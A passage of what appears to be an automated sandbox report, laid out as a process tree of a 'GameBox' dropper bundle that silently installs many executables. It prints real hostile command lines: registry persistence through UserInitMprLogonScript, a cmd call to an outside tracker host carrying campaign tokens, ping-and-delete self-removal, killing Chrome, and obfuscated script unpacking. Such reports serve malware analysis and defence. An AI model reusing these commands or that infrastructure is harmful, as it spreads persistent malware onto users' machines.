                                                        PID:4124
                                                        • C:\Users\Admin\Documents\zfh2VRdNCWnh7Koq4ANvKUkh.exe
                                                          "C:\Users\Admin\Documents\zfh2VRdNCWnh7Koq4ANvKUkh.exe" -q
                                                          3⤵
                                                            PID:4300
                                                        • C:\Users\Admin\Documents\sL6UmBDKkPI3MGqS_gM5Xrb6.exe
                                                          "C:\Users\Admin\Documents\sL6UmBDKkPI3MGqS_gM5Xrb6.exe"
                                                          2⤵
                                                          • Executes dropped EXE
                                                          PID:4476
                                                          • C:\Users\Admin\AppData\Local\Temp\is-HHU1D.tmp\sL6UmBDKkPI3MGqS_gM5Xrb6.tmp
                                                            "C:\Users\Admin\AppData\Local\Temp\is-HHU1D.tmp\sL6UmBDKkPI3MGqS_gM5Xrb6.tmp" /SL5="$3026E,138429,56832,C:\Users\Admin\Documents\sL6UmBDKkPI3MGqS_gM5Xrb6.exe"
                                                            3⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious use of FindShellTrayWindow
                                                            PID:4572
                                                            • C:\Users\Admin\AppData\Local\Temp\is-VAODS.tmp\Setup.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\is-VAODS.tmp\Setup.exe" /Verysilent
                                                              4⤵
                                                                PID:4348
                                                                • C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe
                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  PID:5056
                                                                • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  PID:1840
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-N6SQG.tmp\Inlog.tmp
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-N6SQG.tmp\Inlog.tmp" /SL5="$20302,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    • Suspicious use of FindShellTrayWindow
                                                                    PID:5148
                                                                    • C:\Users\Admin\AppData\Local\Temp\is-B43FO.tmp\Setup.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\is-B43FO.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                      7⤵
                                                                        PID:7704
                                                                        • C:\Users\Admin\AppData\Local\Temp\is-3MG9P.tmp\Setup.tmp
                                                                          "C:\Users\Admin\AppData\Local\Temp\is-3MG9P.tmp\Setup.tmp" /SL5="$40238,17369807,721408,C:\Users\Admin\AppData\Local\Temp\is-B43FO.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                          8⤵
                                                                          • Loads dropped DLL
                                                                          • Drops file in Program Files directory
                                                                          • Suspicious use of FindShellTrayWindow
                                                                          PID:8184
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-QIAPN.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                                            9⤵
                                                                              PID:8044
                                                                              • C:\Windows\SysWOW64\expand.exe
                                                                                expand C:\Users\Admin\AppData\Local\Temp\is-QIAPN.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                                                10⤵
                                                                                • Drops file in Windows directory
                                                                                PID:4504
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                              9⤵
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:5116
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                10⤵
                                                                                  PID:7912
                                                                              • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                                "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                                9⤵
                                                                                • Loads dropped DLL
                                                                                PID:8220
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                                                9⤵
                                                                                • Checks computer location settings
                                                                                PID:8700
                                                                              • C:\Users\Admin\AppData\Local\Temp\is-QIAPN.tmp\{app}\vdi_compiler.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\is-QIAPN.tmp\{app}\vdi_compiler"
                                                                                9⤵
                                                                                  PID:2332
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-QIAPN.tmp\{app}\vdi_compiler.exe"
                                                                                    10⤵
                                                                                      PID:2308
                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                        ping localhost -n 4
                                                                                        11⤵
                                                                                        • Runs ping.exe
                                                                                        PID:6016
                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Enumerates connected drives
                                                                            • Suspicious use of FindShellTrayWindow
                                                                            PID:5160
                                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629289458 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                                              6⤵
                                                                                PID:6232
                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                              5⤵
                                                                                PID:5188
                                                                                • C:\Users\Admin\AppData\Local\Temp\is-HMAPB.tmp\WEATHER Manager.tmp
                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-HMAPB.tmp\WEATHER Manager.tmp" /SL5="$1030E,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                  6⤵
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                  PID:5320
                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-ASAG0.tmp\Setup.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-ASAG0.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                                                    7⤵
                                                                                    • Loads dropped DLL
                                                                                    • Enumerates connected drives
                                                                                    • Modifies system certificate store
                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                    PID:1700
                                                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                                                      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-ASAG0.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-ASAG0.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629289458 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                                                      8⤵
                                                                                        PID:8704
                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe
                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"
                                                                                  5⤵
                                                                                  • Executes dropped EXE
                                                                                  • Checks whether UAC is enabled
                                                                                  • Drops file in Program Files directory
                                                                                  PID:5280
                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
                                                                                  5⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:5328
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    cmd.exe /c taskkill /f /im chrome.exe
                                                                                    6⤵
                                                                                      PID:6864
                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                        taskkill /f /im chrome.exe
                                                                                        7⤵
                                                                                        • Kills process with taskkill
                                                                                        PID:6948
                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                    5⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:5212
                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-65BUI.tmp\VPN.tmp
                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-65BUI.tmp\VPN.tmp" /SL5="$10326,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                      6⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                      PID:5456
                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-3O8MD.tmp\Setup.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-3O8MD.tmp\Setup.exe" /silent /subid=720
                                                                                        7⤵
                                                                                          PID:7744
                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-DMM4G.tmp\Setup.tmp
                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-DMM4G.tmp\Setup.tmp" /SL5="$20418,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-3O8MD.tmp\Setup.exe" /silent /subid=720
                                                                                            8⤵
                                                                                            • Loads dropped DLL
                                                                                            • Drops file in Program Files directory
                                                                                            • Modifies system certificate store
                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                            PID:8164
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                              9⤵
                                                                                                PID:4480
                                                                                                • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                  tapinstall.exe remove tap0901
                                                                                                  10⤵
                                                                                                  • Checks SCSI registry key(s)
                                                                                                  PID:8048
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                                9⤵
                                                                                                  PID:5116
                                                                                                  • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                    tapinstall.exe install OemVista.inf tap0901
                                                                                                    10⤵
                                                                                                    • Drops file in System32 directory
                                                                                                    • Drops file in Windows directory
                                                                                                    • Checks SCSI registry key(s)
                                                                                                    PID:8860
                                                                                                • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                  "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                                  9⤵
                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                  PID:8836
                                                                                                • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                  "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                                  9⤵
                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                  PID:3000
                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                          5⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:5384
                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-E3A0O.tmp\MediaBurner2.tmp
                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-E3A0O.tmp\MediaBurner2.tmp" /SL5="$2036A,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                            6⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            PID:5704
                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-FTAHK.tmp\3377047_logo_media.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-FTAHK.tmp\3377047_logo_media.exe" /S /UID=burnerch2
                                                                                              7⤵
                                                                                              • Drops file in Drivers directory
                                                                                              • Adds Run key to start application
                                                                                              • Drops file in Program Files directory
                                                                                              PID:5668
                                                                                              • C:\Program Files\Microsoft Office\YBLXFZOSON\ultramediaburner.exe
                                                                                                "C:\Program Files\Microsoft Office\YBLXFZOSON\ultramediaburner.exe" /VERYSILENT
                                                                                                8⤵
                                                                                                  PID:8108
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-IFSQD.tmp\ultramediaburner.tmp
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-IFSQD.tmp\ultramediaburner.tmp" /SL5="$20480,281924,62464,C:\Program Files\Microsoft Office\YBLXFZOSON\ultramediaburner.exe" /VERYSILENT
                                                                                                    9⤵
                                                                                                    • Drops file in Program Files directory
                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                    PID:7448
                                                                                                    • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                      "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                      10⤵
                                                                                                        PID:6992
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\13-1a3e9-50f-455af-cc9464516b1cf\Luxilogybu.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\13-1a3e9-50f-455af-cc9464516b1cf\Luxilogybu.exe"
                                                                                                    8⤵
                                                                                                    • Checks computer location settings
                                                                                                    PID:3420
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\3b-0167e-584-d7783-ec57b87dd3f8d\ZHusushuqiri.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\3b-0167e-584-d7783-ec57b87dd3f8d\ZHusushuqiri.exe"
                                                                                                    8⤵
                                                                                                      PID:7436
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gk52vrf4.2dd\GcleanerEU.exe /eufive & exit
                                                                                                        9⤵
                                                                                                          PID:4252
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\gk52vrf4.2dd\GcleanerEU.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\gk52vrf4.2dd\GcleanerEU.exe /eufive
                                                                                                            10⤵
                                                                                                              PID:6868
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3mow2wvb.set\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                            9⤵
                                                                                                              PID:7376
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\3mow2wvb.set\installer.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\3mow2wvb.set\installer.exe /qn CAMPAIGN="654"
                                                                                                                10⤵
                                                                                                                • Loads dropped DLL
                                                                                                                • Enumerates connected drives
                                                                                                                • Modifies system certificate store
                                                                                                                PID:5444
                                                                                                                • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                  "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\3mow2wvb.set\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\3mow2wvb.set\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629289458 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                                  11⤵
                                                                                                                    PID:5940
                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mzlichsz.p1c\ufgaa.exe & exit
                                                                                                                9⤵
                                                                                                                  PID:6356
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jltuqxxt.5tj\anyname.exe & exit
                                                                                                                  9⤵
                                                                                                                    PID:8300
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jltuqxxt.5tj\anyname.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jltuqxxt.5tj\anyname.exe
                                                                                                                      10⤵
                                                                                                                        PID:8676
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jltuqxxt.5tj\anyname.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\jltuqxxt.5tj\anyname.exe" -q
                                                                                                                          11⤵
                                                                                                                            PID:8912
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gmd403iv.mxu\gcleaner.exe /mixfive & exit
                                                                                                                        9⤵
                                                                                                                          PID:8736
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\gmd403iv.mxu\gcleaner.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\gmd403iv.mxu\gcleaner.exe /mixfive
                                                                                                                            10⤵
                                                                                                                              PID:9136
                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yf0pdytd.euo\autosubplayer.exe /S & exit
                                                                                                                            9⤵
                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                            PID:6536
                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                                                                    5⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:5428
                                                                                                                    • C:\Users\Admin\AppData\Roaming\5210263.exe
                                                                                                                      "C:\Users\Admin\AppData\Roaming\5210263.exe"
                                                                                                                      6⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:4288
                                                                                                                    • C:\Users\Admin\AppData\Roaming\5071110.exe
                                                                                                                      "C:\Users\Admin\AppData\Roaming\5071110.exe"
                                                                                                                      6⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Suspicious behavior: SetClipboardViewer
                                                                                                                      PID:4148
                                                                                                                    • C:\Users\Admin\AppData\Roaming\1031486.exe
                                                                                                                      "C:\Users\Admin\AppData\Roaming\1031486.exe"
                                                                                                                      6⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                      PID:652
                                                                                                                    • C:\Users\Admin\AppData\Roaming\7191077.exe
                                                                                                                      "C:\Users\Admin\AppData\Roaming\7191077.exe"
                                                                                                                      6⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:5316
                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
                                                                                                                    5⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:5548
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\tmpC6B7_tmp.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\tmpC6B7_tmp.exe"
                                                                                                                      6⤵
                                                                                                                        PID:6196
                                                                                                                        • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                          "C:\Windows\System32\dllhost.exe"
                                                                                                                          7⤵
                                                                                                                            PID:7924
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
                                                                                                                            7⤵
                                                                                                                              PID:7768
                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                8⤵
                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                PID:7064
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                cmd
                                                                                                                                8⤵
                                                                                                                                  PID:2164
                                                                                                                                  • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                    findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
                                                                                                                                    9⤵
                                                                                                                                      PID:7072
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                      Esplorarne.exe.com i
                                                                                                                                      9⤵
                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                      PID:6272
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                        10⤵
                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                        PID:7512
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                          11⤵
                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                          PID:6488
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                            12⤵
                                                                                                                                              PID:6108
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                13⤵
                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                PID:3848
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                  14⤵
                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                  PID:8392
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                    15⤵
                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                    PID:8724
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                      16⤵
                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                      PID:8200
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                        17⤵
                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                        PID:6356
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                          18⤵
                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                          PID:9072
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                            19⤵
                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                            PID:8596
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                              20⤵
                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                              PID:9000
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                21⤵
                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                PID:8820
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                  22⤵
                                                                                                                                                                  • Drops startup file
                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                  PID:8748
                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                        ping GFBFPSXA -n 30
                                                                                                                                        9⤵
                                                                                                                                        • Runs ping.exe
                                                                                                                                        PID:6644
                                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                                                                5⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:5488
                                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                                                                  6⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:4060
                                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                                                                5⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Checks computer location settings
                                                                                                                                PID:5596
                                                                                                                                • C:\Users\Admin\Documents\Uhuz1YuJt2vxkOHsHtbHrl6f.exe
                                                                                                                                  "C:\Users\Admin\Documents\Uhuz1YuJt2vxkOHsHtbHrl6f.exe"
                                                                                                                                  6⤵
                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                  PID:7032
                                                                                                                                  • C:\Users\Admin\Documents\Uhuz1YuJt2vxkOHsHtbHrl6f.exe
                                                                                                                                    C:\Users\Admin\Documents\Uhuz1YuJt2vxkOHsHtbHrl6f.exe
                                                                                                                                    7⤵
                                                                                                                                      PID:7464
                                                                                                                                    • C:\Users\Admin\Documents\Uhuz1YuJt2vxkOHsHtbHrl6f.exe
                                                                                                                                      C:\Users\Admin\Documents\Uhuz1YuJt2vxkOHsHtbHrl6f.exe
                                                                                                                                      7⤵
                                                                                                                                        PID:7648
                                                                                                                                    • C:\Users\Admin\Documents\A2meC6U60Qccya6BCFTme70K.exe
                                                                                                                                      "C:\Users\Admin\Documents\A2meC6U60Qccya6BCFTme70K.exe"
                                                                                                                                      6⤵
                                                                                                                                        PID:7064
                                                                                                                                        • C:\Users\Admin\Documents\A2meC6U60Qccya6BCFTme70K.exe
                                                                                                                                          C:\Users\Admin\Documents\A2meC6U60Qccya6BCFTme70K.exe
                                                                                                                                          7⤵
                                                                                                                                            PID:7440
                                                                                                                                        • C:\Users\Admin\Documents\RsFvYsPYtRQHeFcxV9qR2oUh.exe
                                                                                                                                          "C:\Users\Admin\Documents\RsFvYsPYtRQHeFcxV9qR2oUh.exe"
                                                                                                                                          6⤵
                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                          PID:7084
                                                                                                                                        • C:\Users\Admin\Documents\H16bxGiT5OZ4C89rRIZcS40E.exe
                                                                                                                                          "C:\Users\Admin\Documents\H16bxGiT5OZ4C89rRIZcS40E.exe"
                                                                                                                                          6⤵
                                                                                                                                            PID:7148
                                                                                                                                            • C:\Windows\System32\cmd.exe
